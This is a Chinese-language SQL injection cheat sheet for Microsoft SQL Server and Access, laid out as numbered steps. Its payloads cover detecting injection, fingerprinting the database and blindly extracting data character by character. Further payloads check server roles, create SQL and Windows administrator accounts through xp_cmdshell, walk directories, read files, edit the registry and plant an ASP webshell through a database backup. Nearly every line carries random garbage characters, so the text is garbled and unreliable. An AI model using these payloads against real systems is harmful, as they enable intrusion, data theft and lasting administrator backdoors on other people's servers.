1.判断是否有注入;and 1=1 ;and 1=2 Ir^�BC!<2>
2.初步判断是否是mssql ;and user>0 }�Py�<q�XH
o3fR�3P�%$
3.注入参数是字符'and [查询条件] and ''=' gn�364U a
@
E >�eq.m
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ThbP;CzI#�
(�%.</�|�u
5.判断数据库系统 �E�tJD��'&
GgT=t)�}wu
;and (select count(*) from sysobjects)>0 mssql 48;~�bVr}
6S��)�$3Is
;and (select count(*) from msysobjects)>0 access f7S^yA[�[�
?$��2q P`-
C9G��U�6Ao
tjt�=��N\;
6.猜数据库 ;and (select Count(*) from [数据库名])>0 sBbL~ce50?
���%�6"o8
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 2}59�7Hb �
�rpx��0|{m
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 =[�APMig,n
EmF�]W+!z%
9.(1)猜字段的ascii值(access) F�W/)uf3I�
A<a2TXcIE3
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �cj`�#Tg.�
�,b�.�kw}k
(2)猜字段的ascii值(mssql) r,QJG$ J�o
zo/�0b/lQ�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 oc�����q2�
t;oT {Hge�
10.测试权限结构(mssql) )Gx�":
�
D
a
p�Ka4nI
g<0w/n!jmC
|3aS1�7yL>
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �J6�= �w:c
��8xc8L1;
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �Hxj'38�Y�
�O�\3r%=TF
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ,.J<.#D3J
R%��qX_m\0
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �|:dCVd<du
\��YjB�+[.
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- s��b8z_3��
F��fZ{%E��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- XryQ)�x�(�
u=1B^V,�6V
;and 1=(select IS_MEMBER('db_owner'));-- 5��?D�1]�[
Xqc'R5C�w�
X�
�S6�]C{
aB/{� %�%o
11.添加mssql和系统的帐户 W�NC�M|VUl
3we�.*\2�$
;exec master.dbo.sp_addlogin username;-- jq7vO�r-_g
;exec master.dbo.sp_password null,username,password;-- (N&k�}CO]W
^)(G(�=-Rf
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- u�� �E�u6f
.r�uqRGe�/
;exec master.dbo.xp_cmdshell 'net user username password cC7"J\+r�*
���FZ�M
]o
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- "cIGNTLFA�
?3.(Vqwo�g
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ^�A:!ni@�3
*2w_oKE'+5
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- eUz�U]�6�h
(YaOh^T:�|
L3�-<�K�op
XfD
��z
�#
12.(1)遍历目录 p�_D
on3��
\=HfO?$ Ro
;create table dirs(paths varchar(100), id int) �@1���/�Q�
$71i�+�h]_
;insert dirs exec master.dbo.xp_dirtree 'c:\' a�*pXrp@�
0+$��hkd n
;and (select top 1 paths from dirs)>0 5q0BG!�A%T
�_|Y.!ZRYP
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) �j+��z'���
:V����u7,o
R^mu%dw)(%
�p�~v2X�dR
(2)遍历目录 ,%"�\\#3�S
�2@"0}�po#
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- BH.:_Qrbh[
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 I�,?Fqg'sq
9n0�6n�$F
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 P wt ?9I��
�[)C)p*!Y)
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 c,b`N0dOKL
c�,g]0S?gu
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 0KWy?6 X�
~�v{�C��6)
?qq!%4mTB�
I�@�y2Hx�M
13.mssql中的存储过程 �~;!i)[�-�
?15�POY ?Z
xp_regenumvalues 注册表根键, 子键 �"jk�w8UVz
QZ:]8MH�l]
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �< �-�@�,�
nr<}Hc�^f-
xp_regread 根键,子键,键值名 ��A>&>6�O4
te!��]9rR�
;exec xp_regread 4iL.�4Uj{N
7cO�g(6�N�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �^�`hI00u(
B�a\�wq�:�
xp_regwrite 根键,子键, 值名, 值类型, 值 �%WJ\�'@O\
pw(U< �)��
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 \'�}/&PCkr
Y]�`lE�q�%
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 h&:Q$*A> �
sqMNo��n`5
xp_regdeletevalue 根键,子键,值名 ���TnMVHO-
Kq@��m��?h
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 [Ls2k�&)�0
)Rm
�'Ym�O
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 :yFTaniJ'.
g:�uaI���
ct�whfS|Y0
]�H�Za:aPY
14.mssql的backup创建webshell '<{oYXZW�3
f:JYG]E��&
use model 2F*D�kv��
g-{<v4�NGI
create table cmd(str image); Aoy1<8WP%
�.zSi�mEOF
insert into cmd(str) values (''); l1iF}�>F�2
%����BKR}
backup database model to disk='c:\l.asp'; ��#h
#mOJ5
#1,>��Q�nl
EP*[�"�fx
l���9���ch
15.mssql内置函数 %��0�y3�/W
Zt�pm�_�P6
;and (select @@version)>0 获得Windows的版本号 c9cphZ(z��
�{���C,1w�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �]C!�Y~���
8g2-8p�a�{
;and (select user_name())>0 爆当前系统的连接用户 *Wuct�u^�9
�]y)R� C-N
;and (select db_name())>0 得到当前连接的数据库 �]<o�.aMdV
(x@�i�,Ba@
^V0{Ew�/�x
c5mh�l;+�'
16.简洁的webshell ;'Wzf�J!�q
-�Uhl�9
=
use model C��^8)IN=$
U d�=gds�L
create table cmd(str image); B�1i!te�}*
C.9eXa1wkT
insert into cmd(str) values (''); )T$�f��k��
�M#8�Ao4
T
backup database model to disk='g:\wwwtest\l.asp';
